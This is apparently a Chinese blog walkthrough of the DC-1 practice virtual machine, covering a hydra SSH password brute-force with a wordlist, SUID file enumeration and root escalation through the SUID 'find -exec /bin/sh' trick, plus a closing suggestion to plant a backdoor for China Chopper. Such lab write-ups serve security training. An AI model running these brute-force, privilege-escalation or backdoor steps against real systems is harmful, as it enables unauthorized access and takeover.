【渗透测试】DC-1靶机实战(下)SSH爆破提权

【渗透测试】DC-1靶机实战(上)漏洞扫描获取反弹shell-CSDN博客

7.SSH爆破

复制代码
hydra ssh://172.20.10.4 -l flag4 -P /usr/share/john/password.lst -t 64 -f -vV -o /tmp/hydra.ssh

ssh://10.10.10.31:指定了要攻击的 SSH 服务的地址。
-l flag4:表示用户名是 flag4。 #这里的flag4是已知,具体情况具体分析
-P /usr/share/john/password.lst:指定了密码字典文件的路径。
-t 64:设置并发线程数为 64。
-f:表示找到第一个匹配项后立即停止。
-vV:显示详细和更详细的信息。
-o /tmp/hydra.ssh:指定将结果输出到 /tmp/hydra.ssh 文件。

登录ssh

Webshell 和 SSH 的区别:

Webshell:它是一种网页后门程序,通常是通过利用网站漏洞将恶意脚本文件上传到目标网站服务器上,然后可以通过浏览器等方式与该脚本进行交互,从而执行一些服务器端的操作,比如查看文件、执行命令等,但它主要是基于 Web 环境进行操作。

SSH(Secure Shell):这是一种加密的网络协议,用于在不安全的网络中为两个远程系统提供安全的加密通信。SSH 允许用户通过命令行界面远程登录到其他系统,并在远程系统上执行各种操作,它提供了更全面和系统级的访问和控制权限。 总的来说,webshell 是一种针对特定网站的非法控制手段,而 SSH 是一种正规的远程访问和通信协议。两者在本质、功能和使用场景等方面都有明显区别。同时,任何未经授权的使用都是不合法和不道德的行为。

8.提权

ssh爆破shell与前面使用metasploit获取的webshell同样可以进行SUID提权

复制代码
flag4@DC-1:~$ find / -perm -4000 2>/dev/null

find /:表示从根目录(/)开始查找。

-perm -4000:查找具有特殊权限(SetUID)为 4000 的文件。SetUID 权限允许用户以文件所有者的权限来运行该程序,即使执行该程序的用户本身不具有这样的权限。

2>/dev/null:将错误输出(标准错误)重定向到空设备(/dev/null),这样可以避免在屏幕上显示错误信息。

/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find
/usr/sbin/exim4
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/sbin/mount.nfs

flag4@DC-1:/tmp$ mkdir xiaolu
flag4@DC-1:/tmp$ find xiaolu -exec 'whoami' \;
root
flag4@DC-1:/tmp$ find xiaolu -exec '/bin/bash' \;
bash-4.2$ id
uid=1001(flag4) gid=1001(flag4) groups=1001(flag4)
bash-4.2$ exit
exit
flag4@DC-1:/tmp$ find ajest -exec '/bin/sh' \;
# id
uid=1001(flag4) gid=1001(flag4) euid=0(root) groups=0(root),1001(flag4)

拿到flag

9.扩展思路

metasploit获取建立反弹shell后可以进行后门上传使用菜刀连接

相关推荐
xcLeigh3 小时前
KES数据库安全、权限、审计实战
数据库·安全·备份·权限·审计·ssl加密·密码策略
高翔·权衡之境6 小时前
缓存一致性——多核系统的默契之约
驱动开发·嵌入式硬件·安全·缓存·系统安全·信息与通信
zhongerzixunshi8 小时前
筑牢国家安全防线,赋能企业合规发展
大数据·人工智能·安全
sunshine8858 小时前
数据安全即资产安全:通过ISO 27001认证提升财务数据可信度
安全
S1998_1997111609•X9 小时前
电容〇解临界过流恶意注入污染寄生的边缘锯齿噪声污染孪生
安全·百度·哈希算法·量子计算·开闭原则
一拳一个娘娘腔9 小时前
第一部分:外网打点篇——边界突破
安全
treesforest9 小时前
IP地理位置精准查询:从城市级到街道级的定位技术深度解析
大数据·网络·网络协议·tcp/ip·安全·网络安全·ip
DarrenHChen_EDA9 小时前
【汽车芯片功能安全分析与故障注入实践 05】Architectural、RTL、Netlist 三个阶段的安全分析差异
安全·汽车·功能安全·rtl·architecture·汽车芯片·netlist
万法若空9 小时前
Nmap 完全使用指南:从入门到精通
安全·web安全
晓梦林10 小时前
Loooower靶场学习笔记
笔记·学习·安全·web安全